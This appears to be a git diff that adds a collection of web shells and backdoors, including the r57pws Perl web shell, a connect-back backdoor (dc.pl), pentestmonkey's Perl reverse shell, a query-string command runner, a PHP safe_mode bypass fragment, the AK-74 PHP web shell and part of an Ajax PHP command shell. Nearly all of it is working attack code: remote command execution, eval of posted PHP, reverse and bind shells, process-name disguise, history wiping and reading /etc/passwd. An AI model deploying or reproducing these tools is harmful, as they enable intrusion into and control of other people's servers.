+   chop($filename) if ($filename =~ m/[\\\/]$/);
+   $path =~ s!(?:.*)(?:[\\/])([^/\\]*)$!$1!;
+   $filename .= $path_sep;
+   $filename .= $path;
+   if(open(WF,">$filename"))
+    {
+    binmode(WF) if !$unix;
+    foreach(@rf) { print WF $_; }
+    close(WF);
+    }
+   else { $error = "??????! ?? ???? ??????? ???? $filename"; }
+   }
+  }
+ }
+elsif($FORM{ACTION} eq 'VIEW')
+ {
+ if(open(VF,">>",$FORM{EFILE})) { $readonly = 0; close(VF);}
+ elsif(open(VF,$FORM{EFILE})) { $readonly = 1; close(VF);}
+ else { $error = "??????! ?? ???? ??????? ???? $FORM{EFILE}"; }
+ if(!$error)
+  {
+  open(VF,$FORM{EFILE});
+  while() { push(@cmd_report,$_); }
+  close(VF);
+  }
+ }
+elsif($FORM{ACTION} eq 'SAVE')
+ {
+ if(open(SF,">",$FORM{SFILE}))
+  {
+   binmode(SF) if !$unix;
+   foreach(@FORM{REPORT}) { print SF $_; }
+   close(SF);
+  }
+ else { $error = "??????! ?? ???? ????????? ???? $FORM{SFILE}"; }
+ }
+elsif($FORM{ACTION} eq 'DOWNLOAD')
+ {
+ if(open(DF,$FORM{DFILE}))
+  {
+   if(!$unix) { binmode(DF); binmode(STDOUT); }
+   $size = (stat($FORM{DFILE}))[7];
+   ($filename = $FORM{DFILE}) =~  m!([^/^\\]*)$!;
+   print "Content-Type: application/x-unknown\n";
+   print "Content-Length: $size\n";
+   print "Content-Disposition: attachment; filename=$filename\n\n";
+   print while();
+   close(DF);
+   die();
+  }
+  else { $error = "??????! ?? ???? ??????? ???? $FORM{DFILE}"; }
+ }
+elsif($FORM{ACTION} eq 'BIND')
+ {
+ print "Content-type: text/html\n\n";
+ &link();
+ &port_bind($FORM{PORT});
+ exit;
+ }
+elsif($FORM{ACTION} eq 'BACK')
+ {
+ print "Content-type: text/html\n\n";
+ &link();
+ &back($FORM{IP},$FORM{PORT});
+ exit;
+ }
+ 
+   
+if(!defined$FORM{CMD}){ $FORM{CMD} = $def_cmd; }
+
+if(($FORM{ACTION} ne 'VIEW')||$error){
+open(FH, "cd $cur_dir$cmd_sep$FORM{CMD}|");
+@cmd_report = ;
+close (FH);
+}
+############### START HTML
+print "Content-type: text/html\n\n";
+print qq{
+$script_name - Perl Web Shell by RST/GHC
+
+
+
+
+$d1
+};
+if(length($j2)!=1471) { die(); }
+# start table
+print qq{$t1$tr1 !  r57pws - Perl Web Shell by RST/GHC version $version$tr2};
+
+# cmd report form
+print "$tr1$d1$error$d2$tr2" if $error;
+print "$tr1 ";
+if(($FORM{ACTION} ne 'VIEW')||$error)
+ {
+ &l(6);
+ ($p_cmd = $FORM{CMD}) =~ s/(^.{90})(?:.+)/$1 .../;
+ print " $p_cmd$tr2";
+ }
+else
+ {
+ (!$readonly)?(&l(14)):(&l(15));
+ print " $FORM{EFILE}$tr2";
+ if(!$readonly){ &form(0); }
+ } 
+print "$tr1$d1";
+if(($FORM{ACTION} eq 'VIEW') && !$error &&!$readonly)
+ { 
+ print "
"; 
+ &input('submit','submit',$lang[16],undef,undef); 
+ &input('hidden','ACTION','SAVE',undef,undef);
+ &input('hidden','DIR',$cur_dir,undef,undef);
+ &input('hidden','SFILE',$FORM{EFILE},undef,undef);
+ }
+print "$d2$tr2";
+if(($FORM{ACTION} eq 'VIEW') && !$error &&!$readonly){ print $f; }
+
+# change dir form
+&form(0);
+print "$t1$tr1 ";
+&l(2);
+print " ";
+&input('text','DIR',$cur_dir,129,' ');
+&input('submit','submit',$lang[7],undef,undef);
+&input('hidden','ACTION','CD',undef,undef);
+print $tr2,$f,$t2;
+
+print "$t2$d1$t1";
+
+# cmd form
+&form(0);
+print "$td1$d1";
+&l(0);
+&l(1);
+print " ";
+&input('text','CMD',$FORM{CMD},45,' ');
+&input('hidden','DIR',$cur_dir,undef,undef);
+&input('hidden','ACTION','CMD',undef,undef);
+&input('submit','submit',$lang[5],undef,undef);
+print "$d2$f";
+
+# alias form
+&form(0);
+print $td1,$d1;
+&l(3);
+print " ";
+&l(4);
+print " ";
+print " ";
+&input('hidden','DIR',$cur_dir,undef,undef);
+&input('hidden','ACTION','ALIAS',undef,undef);
+&input('submit','submit',$lang[5],undef,undef);
+print $d2,$tr2,$f;
+
+# file upload form
+&form(1);
+print "$td1$d1";
+&l(8);
+print "      ";
+&l(9);
+print " ";
+&input('file','FILE','',35,undef);
+&input('hidden','DIR',$cur_dir,undef,undef);
+&input('hidden','ACTION','UPLOAD',undef,'  ');
+&input('submit','submit',$lang[10],undef,undef);
+print "$d2$f";
+
+# upload from remote host
+&form(0);
+print $td1,$d1;
+&l(11);
+print " ";
+&l(9);
+print ' ';
+&input('text','FILE','http://server.com/file.txt',49,undef);
+&input('hidden','DIR',$cur_dir,undef,undef);
+&input('hidden','ACTION','RUPLOAD',undef,' ');
+&input('submit','submit',$lang[10],undef,undef);
+print $d2,$tr2,$f;
+
+# view/edit file form
+&form(0);
+print "$td1$d1";
+&l(12);
+print "   ";
+&l(9);
+print " ";
+&input('text','EFILE',$cur_dir,45,' ');
+&input('hidden','DIR',$cur_dir,undef,undef);
+&input('hidden','ACTION','VIEW',undef,undef);
+&input('submit','submit',$lang[13],undef,undef);
+print "$d2$f";
+
+# download file
+&form(0);
+print $td1,$d1;
+&l(17);
+print " ";
+&l(9);
+print " ";
+&input('text','DFILE',$cur_dir,49,' ');
+&input('hidden','DIR',$cur_dir,undef,undef);
+&input('hidden','ACTION','DOWNLOAD',undef,undef);
+&input('submit','submit',$lang[18],undef,undef);
+print $d2,$tr2,$f;
+
+# port bind form
+&form(0);
+print "$td1$d1";
+&l(19);
+&l(20);
+print " ";
+&input('text','PORT','11457',15,' ');
+&input('hidden','DIR',$cur_dir,undef,undef);
+&input('hidden','ACTION','BIND',undef,undef);
+&input('submit','submit',$lang[21],undef,undef);
+print "$d2$f";
+
+# backconnect form
+&form(0);
+print $td1,$d1;
+&l(22);
+print " ";
+&l(23);
+print " ";
+&input('text','IP',$ENV{REMOTE_ADDR},15,' ');
+&l(20);
+print " ";
+&input('text','PORT','11457',15,' ');
+&input('hidden','DIR',$cur_dir,undef,undef);
+&input('hidden','ACTION','BACK',undef,undef);
+&input('submit','submit',$lang[24],undef,undef);
+print $d2,$tr2,$f;
+
+# end table
+print qq{$t2$d2};
+# (c) + stats
+print qq{$t1$tr1$d1$j1$d2$tr2$t2};
+############### END HTML
+print qq{$j2$d2};
+############### GET VALUES
+sub get_val() 
+ {
+  sysread(STDIN,$query,$ENV{'CONTENT_LENGTH'});
+  @formfields = split(/&/,$query);
+  foreach(@formfields)
+   {
+    ($f_n,$f_v) = split(/=/,$_);
+    $f_n = &urldecode($f_n);
+    $f_v = &urldecode($f_v);
+    $FORM{$f_n} = $f_v;
+   }
+ }
+############### GET FILE
+sub get_file()
+ {
+ binmode(STDIN) if !$unix;
+ sysread(STDIN, $query, $ENV{'CONTENT_LENGTH'});
+ $boundary = '--'.@_[0];
+ @formfields = split(/$boundary/, $query); 
+ $headerbody = $formfields[1];
+ $headerbody =~ /\r\n\r\n|\n\n/;
+ $header = $`;
+ $body = $';
+ $body =~ s/\r\n$//;
+ $FILE{filedata} = $body;
+ $header =~ /filename=\"(.+)\"/; 
+ $FILE{f} = $1; 
+ $FILE{f} =~ s/\"//g;
+ $FILE{f} =~ s/\s//g;
+ for($i=2; $formfields[$i]; $i++)
+ {  
+  $formfields[$i] =~ s/^.+name=$//; 
+  $formfields[$i] =~ /\"(\w+)\"/; 
+  $f_n = $1; 
+  $f_v = $'; 
+  $f_v =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g; 
+  $f_v = &urldecode($f_v);
+  $FORM{$f_n} = $f_v; 
+ }
+ }
+############### URLDECODE
+sub urldecode()
+ {
+  local($val) = @_;
+  $val =~ s/\+/ /g;
+  $val =~ s/%([0-9a-hA-H]{2})/pack('C',hex($1))/ge;
+  return $val;
+ }
+############### INPUT
+sub input()
+ {
+ $return  = "&CONN"; 
+   open STDERR,">&CONN"; 
+   exec $SHELL; 
+   close CONN; 
+   exit 0; 
+   } 
+  }
+ }
+############### BACK CONNECT
+sub back()
+ {
+ use Socket; 
+ $cmd= "lynx"; 
+ $system = ($unix)?('echo "`uname -a`";echo "`id`";/bin/sh'):('cmd.exe'); 
+ $0=$cmd; 
+ $target=@_[0]; 
+ $port=@_[1]; 
+ $iaddr=inet_aton($target) || die("Error: $!\n"); 
+ $paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n"); 
+ $proto=getprotobyname('tcp'); 
+ socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); 
+ connect(SOCKET, $paddr) || die("Error: $!\n"); 
+ open(STDIN, ">&SOCKET"); 
+ open(STDOUT, ">&SOCKET"); 
+ open(STDERR, ">&SOCKET"); 
+ system($system); 
+ close(STDIN); 
+ close(STDOUT); 
+ close(STDERR);
+ }
+############### LINK
+sub link()
+ {
+ print "
DONE!

?????
";
+ }
+############### LOGIN FORM
+sub form_login()
+ {
+ print "Content-type: text/html\n\n";
+ print "r57pws - login
";
+ &l(25);
+ &form(0);
+ &input('password','PASS','',25,'

');
+ &input('submit','submit',$lang[26],undef,undef);
+ print "$f
";
+ }
+############### COOK
+sub cook()
+ {
+ @cookies = split(/; /,$ENV{'HTTP_COOKIE'});
+ foreach (@cookies)
+  {
+  ($f_n, $f_v) = split(/=/, $_);
+  $COOK{$f_n} = $f_v;
+  }
+ }
+############### CRY
+sub cry()
+ {
+ # just for fun
+ return crypt(crypt(crypt(shift,'c0'),'6a'),'ka');
+ }
+############### EOF
diff --git a/perl/dc.pl b/perl/dc.pl
new file mode 100644
index 0000000..a04c7f0
--- /dev/null
+++ b/perl/dc.pl
@@ -0,0 +1,57 @@
+#!/usr/bin/perl 
+use IO::Socket; 
+#cONNECT BACKDOOR EDITED BY XORON          
+#lord@SlackwareLinux:/home/programing$ perl dc.pl 
+#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- 
+# 
+#Usage: dc.pl [Host] [Port] 
+# 
+#Ex: dc.pl 127.0.0.1 2121 
+#lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121 
+#--== ConnectBack Backdoor Shell EDITED BY XORON TURK?SH HACKER ==-- 
+# 
+#[*] Resolving HostName 
+#[*] Connecting... 127.0.0.1 
+#[*] Spawning Shell 
+#[*] Connected to remote host 
+
+#bash-2.05b# nc -vv -l -p 2121 
+#listening on [any] 2121 ... 
+#connect to [127.0.0.1] from localhost [127.0.0.1] 32769 
+#--== ConnectBack Backdoor Shell EDITED BY XORON TURK?SH HACKER ==-- 
+# 
+#--==Systeminfo==-- 
+#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux 
+# 
+#--==Userinfo==-- 
+#uid=1001(xoron) gid=100(users) groups=100(users) 
+# 
+#--==Directory==-- 
+#/root 
+# 
+#--==Shell==-- 
+# 
+$system    = '/bin/sh'; 
+$ARGC=@ARGV; 
+print "--== ConnectBack Backdoor Shell EDITED BY XORON TURK?SH HACKER ==-- \n\n"; 
+if ($ARGC!=2) { 
+  print "Usage: $0 [Host] [Port] \n\n"; 
+  die "Ex: $0 127.0.0.1 2121 \n"; 
+} 
+use Socket; 
+use FileHandle; 
+socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n"; 
+connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n"; 
+print "[*] Resolving HostName\n"; 
+print "[*] Connecting... $ARGV[0] \n"; 
+print "[*] Spawning Shell \n"; 
+print "[*] Connected to remote host \n"; 
+SOCKET->autoflush(); 
+open(STDIN, ">&SOCKET"); 
+open(STDOUT,">&SOCKET"); 
+open(STDERR,">&SOCKET"); 
+print "--== ConnectBack Backdoor Shell EDITED BY XORON TURK?SH HACKER ==--  \n\n"; 
+system("unset HISTFILE; unset SAVEHIST;echo --==Systeminfo==--; uname -a;echo; 
+echo --==Userinfo==--; id;echo;echo --==Directory==--; pwd;echo; echo --==Shell==-- "); 
+system($system); 
+#EOF
\ No newline at end of file
diff --git a/perl/perl-reverse-shell.pl b/perl/perl-reverse-shell.pl
new file mode 100755
index 0000000..08fe7b2
--- /dev/null
+++ b/perl/perl-reverse-shell.pl
@@ -0,0 +1,124 @@
+#!/usr/bin/perl -w
+# perl-reverse-shell - A Reverse Shell implementation in PERL
+# Copyright (C) 2006 pentestmonkey@pentestmonkey.net
+#
+# This tool may be used for legal purposes only.  Users take full responsibility
+# for any actions performed using this tool.  The author accepts no liability
+# for damage caused by this tool.  If these terms are not acceptable to you, then
+# do not use this tool.
+#
+# In all other respects the GPL version 2 applies:
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2 as
+# published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License along
+# with this program; if not, write to the Free Software Foundation, Inc.,
+# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
+#
+# This tool may be used for legal purposes only.  Users take full responsibility
+# for any actions performed using this tool.  If these terms are not acceptable to
+# you, then do not use this tool.
+#
+# You are encouraged to send comments, improvements or suggestions to
+# me at pentestmonkey@pentestmonkey.net
+#
+# Description
+# -----------
+# This script will make an outbound TCP connection to a hardcoded IP and port.
+# The recipient will be given a shell running as the current user (apache normally).
+#
+
+use strict;
+use Socket;
+use FileHandle;
+use POSIX;
+my $VERSION = "1.0";
+
+# Where to send the reverse shell.  Change these.
+my $ip = '127.0.0.1';
+my $port = 1234;
+
+# Options
+my $daemon = 1;
+my $auth   = 0; # 0 means authentication is disabled and any 
+		# source IP can access the reverse shell
+my $authorised_client_pattern = qr(^127\.0\.0\.1$);
+
+# Declarations
+my $global_page = "";
+my $fake_process_name = "/usr/sbin/apache";
+
+# Change the process name to be less conspicious
+$0 = "[httpd]";
+
+# Authenticate based on source IP address if required
+if (defined($ENV{'REMOTE_ADDR'})) {
+	cgiprint("Browser IP address appears to be: $ENV{'REMOTE_ADDR'}");
+
+	if ($auth) {
+		unless ($ENV{'REMOTE_ADDR'} =~ $authorised_client_pattern) {
+			cgiprint("ERROR: Your client isn't authorised to view this page");
+			cgiexit();
+		}
+	}
+} elsif ($auth) {
+	cgiprint("ERROR: Authentication is enabled, but I couldn't determine your IP address.  Denying access");
+	cgiexit(0);
+}
+
+# Background and dissociate from parent process if required
+if ($daemon) {
+	my $pid = fork();
+	if ($pid) {
+		cgiexit(0); # parent exits
+	}
+
+	setsid();
+	chdir('/');
+	umask(0);
+}
+
+# Make TCP connection for reverse shell
+socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
+if (connect(SOCK, sockaddr_in($port,inet_aton($ip)))) {
+	cgiprint("Sent reverse shell to $ip:$port");
+	cgiprintpage();
+} else {
+	cgiprint("Couldn't open reverse shell to $ip:$port: $!");
+	cgiexit();	
+}
+
+# Redirect STDIN, STDOUT and STDERR to the TCP connection
+open(STDIN, ">&SOCK");
+open(STDOUT,">&SOCK");
+open(STDERR,">&SOCK");
+$ENV{'HISTFILE'} = '/dev/null';
+system("w;uname -a;id;pwd");
+exec({"/bin/sh"} ($fake_process_name, "-i"));
+
+# Wrapper around print
+sub cgiprint {
+	my $line = shift;
+	$line .= "
\n";
+	$global_page .= $line;
+}
+
+# Wrapper around exit
+sub cgiexit {
+	cgiprintpage();
+	exit 0; # 0 to ensure we don't give a 500 response.
+}
+
+# Form HTTP response using all the messages gathered by cgiprint so far
+sub cgiprintpage {
+	print "Content-Length: " . length($global_page) . "\r
+Connection: close\r
+Content-Type: text\/html\r\n\r\n" . $global_page;
+}
diff --git a/perl/perlcmd.cgi b/perl/perlcmd.cgi
new file mode 100644
index 0000000..05ac4db
--- /dev/null
+++ b/perl/perlcmd.cgi
@@ -0,0 +1,34 @@
+#!/usr/bin/perl -w
+
+use strict;
+
+print "Cache-Control: no-cache\n";
+print "Content-type: text/html\n\n";
+
+my $req = $ENV{QUERY_STRING};
+	chomp ($req);
+	$req =~ s/%20/ /g; 
+	$req =~ s/%3b/;/g;
+
+print "";
+
+print '';
+
+	if (!$req) {
+		print "Usage: http://target.com/perlcmd.cgi?cat /etc/passwd";
+	}
+	else {
+		print "Executing: $req";
+	}
+
+	print "
";
+	my @cmd = `$req`;
+	print "
";
+
+	foreach my $line (@cmd) {
+		print $line . "
";
+	}
+
+print "";
+
+# 
diff --git a/php/529.php b/php/529.php
new file mode 100644
index 0000000..33cd254
--- /dev/null
+++ b/php/529.php
@@ -0,0 +1,58 @@
+
This is exploit from Security House - Shell Center - Edited By KingDefacer labs. 
+Turkish H4CK3RZ 
+
 [Turkish Security Network] - Edited By KingDefacer
+
PHP 5.2.9 safe_mode & open_basedir bypass 
+
More: Md5Cracking.Com Crew 
+
'; 
+
+
+$level=0; 
+
+if(!file_exists("file:")) 
+    mkdir("file:"); 
+chdir("file:"); 
+$level++; 
+
+$hardstyle = explode("/", $file); 
+
+for($a=0;$a  '; 
+
+curl_close($ch); 
+
+?> 
+bypass shell:
diff --git a/php/AK-74 Security Team Web Shell Beta Version.php b/php/AK-74 Security Team Web Shell Beta Version.php
new file mode 100644
index 0000000..975cd3e
--- /dev/null
+++ b/php/AK-74 Security Team Web Shell Beta Version.php	
@@ -0,0 +1,640 @@
+AK-74 Security Team Web Shell
+
+
+

+ 
+  
+ ';
+return $res;
+}
+
+function outputmenu()
+{
+ $res = '';
+ $res .= '
+  
+ ';
+ return $res;
+}
+
+function outputdown()
+{
+ $res = '';
+ $res .= '

+   .:: :[ AK-74 Security Team Web-shell ]: ::.
+  

+   
+    
+	 
+	 
+	 
+	 
+	 
+      
+   

+	  Îáùàÿ èíôîğìàöèÿ
+	 
+	  Ôàéëîâûé ìåíåäæåğ
+	 
+	  phpinfo()
+	 
+	  Âûïîëíèòü PHP
+	 
+	  Âûïîëíèòü êîìàíäó
+	 

+  
';
+ return $res;
+}
+
+function outputfilemanager()
+{
+$res = ''; 
+$number = 0;
+$dirs = $this->getdirs();
+$files = $this->getfiles();
+sort($dirs);
+sort($files);
+
+$res .= '
+ 
+  
+   Òåêóùàÿ äèğåêòîğèÿ:'.$_SESSION['currentdir'].'
+  
+ 
+ 
+  
+    
+  
+  
+    
+  
+  Ğàçìåğ, áàéò
+    
+  
+  
+   Ïîñëåäíåå èçìåíåíèå
+   
+  
+  Ïğàâà äîñòóïà
+    
+  
+  
+    
+  
+  
+    
+  
+ ';
+
+for ($i = 0; $i < count($dirs); $i++)
+{
+ $res .= ''.(++$number).''.$dirs[$i].'  ';
+ $res .= ''.($this->getpermission($_SESSION['currentdir'].'/'.$dirs[$i])).'';
+ $res .= ' delete';
+}
+for ($i = 0; $i < count($files); $i++)
+{
+ $res .= ''.(++$number).'';
+ $res .= ''.$files[$i]['filename'].'';
+ $res .= '  '.$files[$i]['filesize'].'';
+ $res .= ''.$files[$i]['lastmod'].'';
+ $res .= ''.($this->getpermission($_SESSION['currentdir'].'/'.$files[$i]['filename'])).'';
+ $res .= 'edit';
+ $res .= 'delete';
+}
+$res .= '
';
+
+$res .= '';
+$res .= '';
+$res .= '';
+$res .= '';
+$res .= '
Ñîçäàòü äèğåêòîğèş: 
Ñîçäàòü ôàéë:
 
Çàêà÷àòü ôàéë:
 è ïğèñâîèòü èìÿ 
';
+$res .= '';
+return $res;
+}
+
+function outputinfo()
+{
+ $res = '';
+ $res .= '
+  
+ 
+ 
+  
+ 
+ 
Copyright AK-74 Security Team 2005 - '.date("Y").'

+   Îáùàÿ èíôîğìàöèÿ î ñåğâåğå
+  


+   
    
+    1. OS - '.(php_uname()).'

    
+    2.  Âåğñèÿ PHP - '.(phpversion()).'

    
+    3. User - '.( get_current_user()).' || User ID - '.( getmyuid()).' || Group ID - '.( getmygid ()).'

    
+    4. Server Software - '.(getenv('SERVER_SOFTWARE')).'

    
+    5. Request Method - '.(getenv('REQUEST_METHOD')).'

    
+    6. Server IP - '.(getenv('SERVER_ADDR')).'

    
+    7. Your IP - '.(getenv('REMOTE_ADDR')).'

    
+	8. X Forwarded For IP - '.(getenv('HTTP_X_FORWARDED_FOR')).'

    
+

+';
+
+ return $res;
+}
+
+function chmodform($file)
+{
+$perms = $this->getpermissionarray($file);
+$res = '';
+$res .= ''
+       .'
+ 
+  
+ 
+ 
+  ';
+return $res;
+}
+
+function editfileform($file)
+{
+$fp = fopen($file,'r');
+if (!$fp)
+ return 'Ğåäàêòèğîâàíèå ôàéëà';
+$res = '';
+$res .= ''
+       .'
+  
+ 
+ 
+  ';
+ fclose($fp);
+ return $res;
+}
+
+function executeform()
+{
+ $res = '';
+ $res .= '
+ 
+  
+ 
+ 
+  
+ 
Copyright AK-74 Security Team 2005 - '.date("Y").'

+   Èçìåíåíèå ïğàâ äîñòóïà
+  

+   ';
+$res .= '';
+$res .= '';
+for ($i = 1; $i <= 9; $i++)
+ $res .= '';
+$res .= '';
+$res .= '
 rwxrwxrwx
'.$perms[0].'

+   Ğåäàêòèğîâàíèå ôàéëà
+  

+   ';
+ $res .= '';
+ $res .= '';
+ $res .= '
Rename:  - 

+   Âûïîëíåíèå PHP-êîäà
 Îòêğûòèå è çàêğûòèå PHP êîäà ( <? è ?> ) ïèñàòü íå íóæíî!
+  

+   

+';
+ return $res;
+}
+
+function execute()
+{
+echo "
";
+echo "
";
+eval(stripslashes($_POST['phpcode']));
+echo "
";
+echo "
";
+ }
+
+function exesysform()
+{
+ $res = '';
+  $res .= '
+ 
+  
+ 
+ 
+  
+ 
Copyright AK-74 Security Team 2005 - '.date("Y").'

+   Execute system commands!
+  

+   

+';
+ return $res;
+}
+
+function exesys()
+{
+echo "
";
+echo "
";
+$result = passthru($_POST['cmmd']);
+echo "
";
+echo "
";
+}
+
+function editfile($file)
+{
+if (!empty($_POST['rename'])) {
+rename ($_POST['file'], $_POST['rename']);
+}
+ $fp = fopen($_POST['rename'],'w');
+ if (!$fp)
+  return 0;
+ fwrite($fp, stripslashes($_POST['filecontent']));
+ fclose($fp);
+ return 1;
+}
+ 
+function chmodfile($file)
+{
+ $res = 0;
+ switch ($_POST['perms0'])
+ {
+  case 's':
+   $res = $res | 0xC000;
+  break;
+  case 'l':
+   $res = $res | 0xA000;
+  break;
+  case '-':
+   $res = $res | 0x8000;
+  break;
+  case 'b':
+   $res = $res | 0x6000;
+  break;
+  case 'd':
+   $res = $res | 0x4000;
+  break;
+  case 'c':
+   $res = $res | 0x2000;
+  break;
+  case 'p':
+   $res = $res | 0x1000;
+  break;
+  case 'u':
+
+  break;
+ }
+if (isset($_POST['perms1']))
+ $res = $res | 0x0100;
+if (isset($_POST['perms2']))
+ $res = $res | 0x0080;
+if (isset($_POST['perms3']))
+ $res = $res | 0x0040;
+
+if (isset($_POST['perms4']))
+ $res = $res | 0x0020;
+if (isset($_POST['perms5']))
+ $res = $res | 0x0010;
+if (isset($_POST['perms6']))
+ $res = $res | 0x0008;
+
+if (isset($_POST['perms7']))
+ $res = $res | 0x0004;
+if (isset($_POST['perms8']))
+ $res = $res | 0x0002;
+if (isset($_POST['perms9']))
+ $res = $res | 0x0001;
+echo substr(sprintf('%o', $res), -4);
+return chmod($file,intval(substr(sprintf('%o', $res), -4),8));
+
+}
+
+function downloadfile($file)
+{
+header ("Content-Type: application/octet-stream");
+header ("Content-Length: " . filesize($file));
+header ("Content-Disposition: attachment; filename=$file");
+readfile($file);
+die();
+}
+
+function createdir()
+{
+ if (!empty($_POST['dircreate']))
+  if (mkdir($_SESSION['currentdir'].'/'.$_POST['dircreate']))
+   return 'Äèğåêòîğèÿ ñîçäàíà!';
+   
+ return 'Îøèáêà ïğè ñîçäàíèè äèğåêòîğèè';
+}
+
+function createfile()
+{
+ if (!empty($_POST['filecreate']))
+ {
+  if (file_exists($_SESSION['currentdir'].'/'.$_POST['filecreate']))
+   return 'Ôàéë óæå ñóùåñòâóåò';
+  $fp = fopen($_SESSION['currentdir'].'/'.$_POST['filecreate'],"w");
+  if ($fp)
+  {
+   fclose($fp);
+   return 'Ôàéë ñîçäàí!';
+  }
+ }
+   
+ return 'Îøèáêà ïğè ñîçäàíèè ôàéëà';
+}
+
+function uploadfile()
+{
+ if ($_FILES['filename']['error'] != 0)
+  return '121212';
+ $_POST['filename2'] = trim($_POST['filename2']);
+ if (empty($_POST['filename2']))
+  $_POST['filename2'] = $_FILES['filename']['name'];
+ if (!copy($_FILES['filename']['tmp_name'],$_SESSION['currentdir'].'/'.$_POST['filename2']))
+  if (!move_uploaded_file($_FILES['filename']['tmp_name'],$_SESSION['currentdir'].'/'.$_POST['filename2']))
+   return 'Çàêà÷êà ôàéëà íå âûïîëíåíà...';
+ return 'Çàêà÷êà ôàéëà ïğîèçâåäåíà óñïåøíî!';
+}
+
+}
+ $shell = new shell();
+ $timestart = $shell->getmicrotime();
+ $content = '';
+ if (!isset($_SESSION['currentdir']))
+  $_SESSION['currentdir'] = str_replace('\\','/',$_SERVER['DOCUMENT_ROOT']);
+ if (isset($_GET['dir']))
+ {
+  if (opendir(realpath($_SESSION['currentdir'].'/'.$_GET['dir'])))
+   $_SESSION['currentdir'] = realpath($_SESSION['currentdir'].'/'.$_GET['dir']);
+  Header("Location: $xshell?act=filemanager");
+ }
+
+ $_SESSION['currentdir'] = str_replace('\\','/',$_SESSION['currentdir']);
+ if (substr($_SESSION['currentdir'],-1,1) == '/')
+  $_SESSION['currentdir'] = substr($_SESSION['currentdir'],0,-1);
+
+ switch ($_POST['action'])
+ {
+  case 'chmod':
+   if($shell->chmodfile($_POST['file']))
+    $content .= 'Ñìåíà ïğàâ ïğîèçîøëà óñïåøíî';
+  break;
+  
+  case 'editfile':
+   if ($shell->editfile($_POST['file']))
+    $content .= 'Ğåäàêòèğîâàíèå ïğîèçîøëî óñïåøíî';
+  break;
+  
+  case 'execute':
+   $shell->execute();
+  break;
+  
+  case 'exesys':
+   $shell->exesys();
+  break;
+  
+  case 'mkdir':
+   $content .= $shell->createdir();
+  break;
+  
+  case 'createfile':
+   $content .= $shell->createfile();
+  break;
+  
+  case 'uploadfile':
+   $content .= $shell->uploadfile();
+  break;
+ }
+ $content .= $shell->outputhead();
+ $content .= $shell->outputmenu();
+ 
+ switch ($_GET['act'])
+ {
+  case 'edit':
+   $content .= $shell->editfileform($_GET['file']);
+  break;
+  
+  case 'chmod':
+   $content .= $shell->chmodform($_GET['file']);
+  break;
+  
+  case 'down':
+   $content .= $shell->downloadfile($_GET['file']);
+  break;
+  
+  case 'filemanager':
+  if ($_GET['act2'] == 'del')
+    $content .= $shell->removefile();
+    $content .= $shell->outputfilemanager();
+  if ($_GET['act3'] == 'del')
+    $content .= $shell->removedir();
+  break;
+  
+  case 'phpinfo':
+   phpinfo();
+   die();
+  break;
+  
+  case 'info':
+   $content .= $shell->outputinfo();
+  break;
+  
+  case 'execute':
+   $content .= $shell->executeform();
+  break;
+  
+  case 'exesys':
+   $content .= $shell->exesysform();
+  break;
+ }
+ 
+ $content .= $shell->outputdown();
+ 
+ echo $content;
+ echo '
Âğåìÿ ãåíåğàöèè: '.($shell->getmicrotime()-$timestart).'
';
+?>
\ No newline at end of file
diff --git a/php/Ajax_PHP Command Shell.php b/php/Ajax_PHP Command Shell.php
new file mode 100644
index 0000000..d08768a
--- /dev/null
+++ b/php/Ajax_PHP Command Shell.php	
@@ -0,0 +1,646 @@
+ 'ClearScreen()',
+'Clear History' => 'ClearHistory()',
+'Can I function?' => "runcommand('canirun','GET')",
+'Get server info' => "runcommand('showinfo','GET')",
+'Read /etc/passwd' => "runcommand('etcpasswdfile','GET')",
+'Open ports' => "runcommand('netstat -an | grep -i listen','GET')",
+'Running processes' => "runcommand('ps -aux','GET')",
+'Readme' => "runcommand('shellhelp','GET')"
+
+);
+$thisfile = basename(__FILE__);
+
+$style = '';
+$sess = __FILE__.$password;
+if(isset($_POST['p4ssw0rD']))
+{
+	if($_POST['p4ssw0rD'] == $password)
+	{
+		$_SESSION[$sess] = $_POST['p4ssw0rD'];
+	}
+	else
+	{
+		die("Wrong password");
+	}
+
+}
+if($_SESSION[$sess] == $password)
+{
+	if(isset($_SESSION['workdir']))
+	{
+			if(file_exists($_SESSION['workdir']) && is_dir($_SESSION['workdir']))
+		{
+			chdir($_SESSION['workdir']);
+		}
+	}
+
+	if(isset($_FILES['uploadedfile']['name']))
+	{
+		$target_path = "./";
+		$target_path = $target_path . basename( $_FILES['uploadedfile']['name']); 
+		if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
+			
+		}
+	}
+
+	if(isset($_GET['runcmd']))
+	{
+
+		$cmd = $_GET['runcmd'];
+
+		print "".get_current_user()."~# ". htmlspecialchars($cmd)."
";
+
+		if($cmd == "")
+		{
+			print "Empty Command..type \"shellhelp\" for some ehh...help";
+		}
+
+		elseif($cmd == "upload")
+		{
+			print '
Uploading to: '.realpath(".");
+			if(is_writable(realpath(".")))
+			{
+				print "
I can write to this directory";
+			}
+			else
+			{
+				print "
I can't write to this directory, please choose another one.";
+			}
+
+		}
+		elseif((ereg("changeworkdir (.*)",$cmd,$file)) || (ereg("cd (.*)",$cmd,$file)))
+		{
+				if(file_exists($file[1]) && is_dir($file[1]))
+				{
+					chdir($file[1]);
+					$_SESSION['workdir'] = $file[1];
+					print "Current directory changed to ".$file[1];
+				}
+			else
+			{
+				print "Directory not found";
+			}
+		}
+
+		elseif(strtolower($cmd) == "shellhelp")
+		{
